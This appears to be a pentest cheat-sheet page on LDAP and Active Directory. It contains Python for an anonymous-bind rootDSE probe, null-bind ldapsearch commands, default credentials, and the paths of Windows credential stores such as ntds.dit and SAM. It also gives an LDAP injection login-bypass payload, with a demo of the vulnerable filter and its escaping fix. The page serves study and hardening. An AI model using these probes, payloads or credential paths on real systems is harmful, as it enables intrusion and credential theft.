LDAP
LDAP, LDAPS, Directory Services
LDAP (Lightweight Directory Access Protocol) is the protocol used to query and modify directory services such as OpenLDAP and Active Directory. A server that accepts unauthenticated (anonymous, or "null") binds lets anyone on the network read whatever the directory's ACLs expose to anonymous users, which often means user accounts, group memberships and computer objects.
Ports
| Port | Protocol | Description |
|---|---|---|
| 389 | tcp/udp | LDAP, cleartext by default; STARTTLS upgrades the same TCP port, and UDP 389 is connectionless LDAP (CLDAP), used by AD clients for DC locator pings |
| 636 | tcp | LDAPS (LDAP over TLS) |
| 3268 | tcp | AD Global Catalog (forest-wide search over a partial attribute set) |
| 3269 | tcp | AD Global Catalog over TLS |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| nmap -sV -p <port> <target> | Service and version match from nmap's probes (e.g. OpenLDAP vs. Microsoft Windows Active Directory LDAP) |
| nc -nv <target> <port> | Nothing: LDAP is client-speaks-first, so a raw connect shows only whether the port is open; the server answers only after a BER-encoded request |
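The rootDSE probe is the real LDAP fingerprint: a null bind followed by a base-scope search of the empty DN returns namingContexts, supportedLDAPVersion and (on AD) dnsHostName and defaultNamingContext, with no credentials. The following is an added example, not code from the original page; it hand-encodes both client messages and decodes the BER of the reply, so the wire format of a "null bind" is visible. The bytes in sample_reply() and the DC=corp,DC=local names in it are constructed placeholders, not a capture; probe() is the only function that touches the network and assumes a reachable host.

```python
"""Null (anonymous) bind plus rootDSE query, encoded and decoded by hand.

Added example, not from the original page: BindRequest with empty DN and
empty simple password, then a base-scope SearchRequest for the rootDSE,
plus a BER decoder for the reply. sample_reply() is constructed, not a
capture, so decoding runs offline; probe() is the live path.
"""
import socket

def _len(n: int) -> bytes:
    """BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _len(len(body)) + body

def _int(v): return _tlv(0x02, bytes([v]))           # INTEGER (single-byte values suffice here)
def _enum(v): return _tlv(0x0A, bytes([v]))          # ENUMERATED
def _str(s): return _tlv(0x04, s.encode())           # OCTET STRING
def _seq(*parts): return _tlv(0x30, b"".join(parts)) # SEQUENCE
def _msg(msg_id, op): return _seq(_int(msg_id), op)  # LDAPMessage { messageID, protocolOp }

def anonymous_bind_request(msg_id: int = 1) -> bytes:
    """BindRequest [APPLICATION 0]: version 3, empty name, simple auth [0] with empty password."""
    return _msg(msg_id, _tlv(0x60, _int(3) + _str("") + _tlv(0x80, b"")))

def rootdse_search_request(attrs, msg_id: int = 2) -> bytes:
    """SearchRequest [APPLICATION 3]: base "", scope baseObject, filter (objectClass=*)."""
    body = (_str("") + _enum(0) + _enum(0) + _int(0) + _int(0)  # base, scope, deref, size, time
            + _tlv(0x01, b"\x00")                                # typesOnly FALSE
            + _tlv(0x87, b"objectClass")                         # present filter, context tag [7]
            + _seq(*[_str(a) for a in attrs]))
    return _msg(msg_id, _tlv(0x63, body))

def _read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, body, next_pos) for the TLV at pos, long-form lengths included."""
    tag, first = buf[pos], buf[pos + 1]
    n = 0 if first < 0x80 else first & 0x7F
    length = first if first < 0x80 else int.from_bytes(buf[pos + 2:pos + 2 + n], "big")
    start = pos + 2 + n
    return tag, buf[start:start + length], start + length

def _children(body: bytes):
    pos = 0
    while pos < len(body):
        tag, inner, pos = _read_tlv(body, pos)
        yield tag, inner

def _ops(reply: bytes):
    """Yield (protocolOp tag, body) for each complete LDAPMessage; stop at a truncated one."""
    pos = 0
    while pos + 2 <= len(reply):
        try:
            _, msg, nxt = _read_tlv(reply, pos)
            if nxt > len(reply):
                return
            yield list(_children(msg))[1]      # [0] is the messageID
        except IndexError:                     # partial long-form length or body
            return
        pos = nxt

def bind_result_code(reply: bytes) -> int:
    """resultCode of the first message (a BindResponse [APPLICATION 1]); 0 = success."""
    _, op = next(_ops(reply))
    return list(_children(op))[0][1][0]

def parse_search_entries(reply: bytes) -> dict:
    """Merge attributes from every SearchResultEntry [APPLICATION 4] in reply."""
    result = {}
    for tag, op in _ops(reply):
        if tag == 0x64:
            _, attr_list = list(_children(op))[1]       # objectName, then PartialAttributeList
            for _, attr in _children(attr_list):        # PartialAttribute { type, SET OF value }
                (_, name), (_, vals) = list(_children(attr))
                result.setdefault(name.decode(), []).extend(v.decode() for _, v in _children(vals))
    return result

def probe(host: str, port: int = 389, attrs=("namingContexts", "dnsHostName")) -> dict:
    """Live null-bind probe: returns rootDSE attributes, raises if the bind is refused."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(anonymous_bind_request(1))
        if bind_result_code(s.recv(4096)) != 0:
            raise PermissionError("anonymous bind refused")
        s.sendall(rootdse_search_request(list(attrs), 2))
        data = b""
        while not any(tag == 0x65 for tag, _ in _ops(data)):   # until SearchResultDone
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_search_entries(data)

def sample_reply() -> bytes:
    """Constructed (not captured) reply: BindResponse success, one entry, SearchResultDone."""
    ok = _enum(0) + _str("") + _str("")     # LDAPResult: success, empty matchedDN and diagnostic
    entry = _str("") + _seq(                # objectName "" (the rootDSE) + attribute list
        _seq(_str("namingContexts"), _tlv(0x31, _str("DC=corp,DC=local")
                                               + _str("CN=Configuration,DC=corp,DC=local"))))
    return _msg(1, _tlv(0x61, ok)) + _msg(2, _tlv(0x64, entry)) + _msg(2, _tlv(0x65, ok))
```

`probe("<target>")` is the live call. Anonymous bind is the 14-byte message `30 0c 02 01 01 60 07 02 01 03 04 00 80 00`, which is also what ldapsearch sends when you pass `-x` with no `-D`/`-w`; a server that answers the search with anything beyond the rootDSE, or returns naming contexts for a base you can then enumerate, has the exposure the page describes.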
Key Files
| Path | Description |
|---|---|
| C:\Windows\NTDS\ntds.dit | AD database on a domain controller holding every domain account's NT hash; the hashes are encrypted with the PEK, which is itself protected by the SYSTEM hive boot key, and the file is locked while the DC runs (copy it via VSS or ntdsutil) |
| C:\Windows\System32\config\SAM | Local account password hashes, decryptable with the SYSTEM boot key |
| C:\Windows\System32\config\SYSTEM | System hive; source of the boot key needed to decrypt SAM, SECURITY and ntds.dit secrets |
| C:\Windows\System32\config\SECURITY | LSA secrets (service account passwords, machine account) and cached domain logons (DCC2/mscash2 hashes) |
| %USERPROFILE%\AppData\Roaming\Microsoft\Credentials\ | Credential Manager blobs, DPAPI-protected with the user's master key |
Default Credentials
| Username | Password | Context |
|---|---|---|
| admin | admin | Generic; in LDAP the bind identity is a DN, so try it as cn=admin,<base DN> (OpenLDAP's rootdn is commonly set this way) |
| root | root | Generic; likewise cn=root,<base DN> or cn=Manager,<base DN> |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| CVE-2017-14175 | RCE | OpenLDAP RCE via BER decoding |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Null Bind | ldapsearch -x -H ldap://<target> -s base -b "" namingContexts, then ldapsearch -x -H ldap://<target> -b "dc=domain,dc=com" | Anonymous query: `-x` with no `-D`/`-w` binds with an empty DN and password; the first command reads the base DN from the rootDSE, the second dumps whatever the ACLs expose anonymously |
| LDAP Injection | user=admin*)(uid=*)) | With a filter built as (&(uid=<user>)(userPassword=<pass>)) the input yields (&(uid=admin*)(uid=*))(userPassword=...)); a lenient parser evaluates the first complete filter and the password clause is never checked, so the application "authenticates" admin with any password |
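The injection row above depends on two things: an application that splices untrusted input into a search filter, and a filter decoder that stops at the first complete filter instead of rejecting trailing bytes. The block below is an added example, not code from the original page; it shows the vulnerable construction beside the RFC 4515 fix and runs both through a small filter evaluator. The directory, its two users and the evaluator are constructed stand-ins so the effect is visible offline; in real code the filter goes to slapd or AD through python-ldap or ldap3, whose escape_filter_chars() does what escape_filter_value() does here.

```python
"""LDAP filter injection: vulnerable construction beside the RFC 4515 fix.

Added example, not from the original page. The directory, users and the
filter evaluator are constructed stand-ins so this runs offline.
"""
import re

# Constructed sample directory (cleartext userPassword only so the demo is
# visible; real directories store hashes and should authenticate by binding
# as the user, never by comparing a password inside a search filter).
DIRECTORY = [
    {"uid": "admin", "userPassword": "S3cret!"},
    {"uid": "alice", "userPassword": "hunter2"},
]

def build_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable: untrusted input concatenated straight into the filter."""
    return f"(&(uid={username})(userPassword={password}))"

def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping: '*', '(', ')', '\\' and NUL become \\xx hex escapes."""
    return "".join(f"\\{ord(c):02x}" if c in "*()\\\x00" else c for c in value)

def build_filter_safe(username: str, password: str) -> str:
    """Hardened: every user-supplied assertion value is escaped first."""
    return (f"(&(uid={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")

# --- minimal RFC 4515 filter parser/matcher, constructed for the demo ------
def _parse(f: str, i: int):
    """Parse one filter starting at f[i] == '('; return (node, next_index)."""
    if f[i] != "(":
        raise ValueError(f"expected '(' at {i}")
    i += 1
    if f[i] in "&|!":
        op, kids, i = f[i], [], i + 1
        while f[i] == "(":
            node, i = _parse(f, i)
            kids.append(node)
        return (op, kids), i + 1              # skip the closing ')'
    eq = f.index("=", i)
    close = f.index(")", eq)                  # a raw ')' always ends a simple item
    return ("=", f[i:eq], f[eq + 1:close]), close + 1

def _unhex(p: str) -> str:
    """Turn \\xx escapes back into the literal characters they stand for."""
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), p)

def _value_regex(v: str):
    """Unescaped '*' is a wildcard; escaped characters are matched literally."""
    return re.compile("^" + ".*".join(re.escape(_unhex(p)) for p in v.split("*")) + "$")

def _match(node, entry: dict) -> bool:
    if node[0] == "&":
        return all(_match(k, entry) for k in node[1])
    if node[0] == "|":
        return any(_match(k, entry) for k in node[1])
    if node[0] == "!":
        return not _match(node[1][0], entry)
    _, attr, val = node
    return attr in entry and _value_regex(val).match(entry[attr]) is not None

def search(filter_str: str, strict: bool = False) -> list:
    """Return the uids matched by filter_str.

    strict=False mimics lenient decoders that evaluate the first complete
    filter and ignore trailing bytes (what makes the classic payload work);
    strict=True rejects trailing data, as a conforming decoder should.
    """
    node, end = _parse(filter_str, 0)
    if strict and end != len(filter_str):
        raise ValueError("trailing data after filter")
    return [e["uid"] for e in DIRECTORY if _match(node, e)]

if __name__ == "__main__":
    payload = "*)(uid=*))(|(uid=*"      # closes the AND early, appends an always-true OR
    print(build_filter_unsafe(payload, "wrong"))
    print(search(build_filter_unsafe(payload, "wrong")))   # every uid, no password needed
    print(build_filter_safe(payload, "wrong"))
    print(search(build_filter_safe(payload, "wrong")))     # []
```

The escaped form of the payload still contains `=` and `|`, which RFC 4515 does not require escaping, and is still harmless: once `*`, `(`, `)` and `\` are hex-encoded the whole string is one assertion value. The `strict` flag is the server-side caveat: some decoders reject the leftover `(userPassword=...))`, so the page's payload is parser-dependent, while escaping fixes the bug regardless of the decoder.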
Notes
Always start with a full port scan: `nmap -sV -sC -p- <target>`. LDAP may sit on 389/636 only, or, on a domain controller, also on 3268/3269 (Global Catalog).
Check for null binds and default credentials before brute-forcing. On Active Directory an anonymous bind normally yields only the rootDSE; user and group enumeration without credentials works only where dSHeuristics has been changed to allow anonymous operations.
Use the LDAP NSE scripts: `nmap -p 389 --script ldap-rootdse,ldap-search <target>`; `ldap-search` takes `ldap.username`/`ldap.password` script args once you have a bind.
Remember to check both IPv4 and IPv6 if applicable, and repeat the checks over LDAPS (`ldapsearch -H ldaps://<target>`, with `LDAPTLS_REQCERT=never` for self-signed certificates), since ACLs and exposed ports sometimes differ.
Seen on
Shodan, Censys, FOFA, ZoomEye